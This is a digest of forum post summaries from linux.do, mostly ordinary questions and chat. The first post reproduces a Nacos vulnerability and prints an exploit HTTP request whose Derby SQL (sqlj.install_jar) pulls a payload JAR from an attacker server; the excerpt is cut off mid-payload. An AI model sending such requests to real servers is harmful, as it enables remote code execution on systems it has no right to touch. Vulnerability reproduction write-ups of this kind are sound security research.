标题: nacos漏洞复现分析
作者: #fkalis
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/2155424
时间: 2026-05-11 17:58:01
摘要:
作者: #fkalis
板块: #开发调优
编号:
2155424帖子: https://linux.do/t/topic/2155424
时间: 2026-05-11 17:58:01
摘要:
刚刚发的文章被删了,还是发一些之前的其他的简单文章吧,刚刚加入大家见谅
个人理解的漏洞原理:本质实际上就是在20年那个未授权的基础上添加了命令执行,但是也导致了该漏洞的利用条件变得比较苛刻,目前测试需要比较多的条件才能进行漏洞利用**
1. 0day作者的poc地址
https://github.com/ayoundzw/nacos-poc/blob/main/exploit.py
2. poc提取
根据作者的poc,其本质上就是两种poc数据包,下面的poc并不一定可以直接使用,下面漏洞分析的时候会解答
利用该poc去服务器地址远程下载payload代码
POST /nacos/v1/cs/ops/data/removal HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 487
Content-Type: multipart/form-data; boundary=75fe833dc591c841a56f8fcfba0d650f
--75fe833dc591c841a56f8fcfba0d650f
Content-Disposition: form-data; name="file"; filename="file"
CALL sqlj.install_jar('http://服务端地址/download', 'NACOS.pbKZBiXL', 0)
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.pbKZBiXL')
CREATE FUNCTION S_EXAMPLE_pbKZBiXL( PARAM VARCHAR(2000)) RETURNS VARCHA
标题: codex帮我分析了一个恶意脚本,真棒
作者: #GlitterX
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/2155434
时间: 2026-05-11 17:59:22
摘要:
作者: #GlitterX
板块: #搞七捻三
编号:
2155434帖子: https://linux.do/t/topic/2155434
时间: 2026-05-11 17:59:22
摘要:
网上溜达的时候跳到一个长的很像cloudflare认证的网站,根据它的提示操作了一通,哐哐提示我要输入电脑密码,嘿,我这好奇心一下就上来了,摸到了它的脚本,几次base64解开得到下面这种玩意儿
把它丢给codex
网上溜达的时候还是要小心哦,那个破网站普通人还是很容易中招的
标题: 佬友们,有没有利用AI提高自己的实操,不是简单的完成工作,而是对自己有提升的那种。
作者: #fuxue
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/2155435
时间: 2026-05-11 17:59:35
摘要:
作者: #fuxue
板块: #搞七捻三
编号:
2155435帖子: https://linux.do/t/topic/2155435
时间: 2026-05-11 17:59:35
摘要:
用了AI之后,首先虽然工作可以相对来说有了效率的提升,但是感觉第一个自己变笨了,只会写提示词需求,基本都不去看代码了。
第二个,效率提升之后,感觉什么东西有了AI都很容易,就像以前说的有了网络,什么不懂直接网上搜索就好了,不需要记在脑子里。现在有了AI更是效率加倍,但是对于大脑来说,总有一种“万花丛中过,片草不沾身”的感觉,什么都没留在脑子里。
有没有利用AI纯粹的提升自己,改变自己的佬友现身说法一下呢。
标题: any用户被禁了还有救吗?大佬们
作者: #dengdeng3
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/2155438
时间: 2026-05-11 18:00:03
摘要:
作者: #dengdeng3
板块: #开发调优
编号:
2155438帖子: https://linux.do/t/topic/2155438
时间: 2026-05-11 18:00:03
摘要:
标题: C++数值计算程序开发平台
作者: #wqwqwq
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/2155441
时间: 2026-05-11 18:00:40
摘要:
作者: #wqwqwq
板块: #开发调优
编号:
2155441帖子: https://linux.do/t/topic/2155441
时间: 2026-05-11 18:00:40
摘要:
楼主博士在读,方向是多物理场仿真数值算法,主要工作是开发基于有限元法、有限体积法的仿真程序。
目前开发的平台是Windows 11+WSL2. IDE是JetBrains CLion. 因为数值计算的依赖库在GNU/Linux上兼容性最好,所以必须使用GNU/Linux上的工具链。但是CLion的远程开发有点卡,经常出现软件界面按钮无响应,代码着色局部失效,代码跳转失效等问题。尝试用过VS Code,但是功能确实不如CLion,例如代码重构、代码跳转都不是很完善。
考虑过使用原生GNU/Linux系统,但是科研也需要用到COMSOL和ANSYS这类仿真软件,这些软件大多数在Windows上运行更好。
目前想不到更好的开发环境了
不在开发平台方面,不知道佬友们有没有更好的建议。
标题: 求助,Hermes网关问题怎么解决?
作者: #ZBK
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/2155458
时间: 2026-05-11 18:03:16
摘要:
作者: #ZBK
板块: #搞七捻三
编号:
2155458帖子: https://linux.do/t/topic/2155458
时间: 2026-05-11 18:03:16
摘要:
在执行升级Hermes-web-ui后,网关就一直配置失败并且启动时也超时,有没有佬可以看看是什么原因?防火墙也全关了。
标题: 当能勾起回忆的时候,味道已经不重要了
作者: #Shus
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/2155473
时间: 2026-05-11 18:05:07
摘要:
作者: #Shus
板块: #搞七捻三
编号:
2155473帖子: https://linux.do/t/topic/2155473
时间: 2026-05-11 18:05:07
摘要:
当这份饭能回想到家乡的感觉的时候,做的正不正宗,味道这些都已经不重要了
还有三个月就回家
标题: 我想请教各位佬一个gpt相关的问题
作者: #cocoa
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/2155488
时间: 2026-05-11 18:06:58
摘要:
作者: #cocoa
板块: #开发调优
编号:
2155488帖子: https://linux.do/t/topic/2155488
时间: 2026-05-11 18:06:58
摘要:
我注册的gpt的free号 然后 使用cpa 去挂的 但是在消费的时候 请求不了 报错 {“error”:{“message”:“{\“detail\”:\“Unauthorized\”}”,“type”:“authentication_error”,“code”:“auth_unavailable”}} 是不是上游直接阻断了哦 你们有遇到这样的问题吗标题: hub怎么设置消耗上限
作者: #onjim
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/2155490
时间: 2026-05-11 18:07:56
摘要:
作者: #onjim
板块: #开发调优
编号:
2155490帖子: https://linux.do/t/topic/2155490
时间: 2026-05-11 18:07:56
摘要:
我昨天用了hub感觉共享的真不错,想着分享一下试试给了个1刀上限0.01倍率
没想到给我干超了,还好发现的及时,可以怎么设置消耗上限自动停用
标题: 杀戮尖塔2好好玩
作者: #996sir
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/2155498
时间: 2026-05-11 18:10:19
摘要:
作者: #996sir
板块: #搞七捻三
编号:
2155498帖子: https://linux.do/t/topic/2155498
时间: 2026-05-11 18:10:19
摘要:
最近入坑了杀戮尖塔2,发现好上头啊,目前在和朋友联机玩,大概解锁了三个角色,最上头还得是肚皮流战士,又肉伤害又高 。佬友们,有没有双人好玩的组合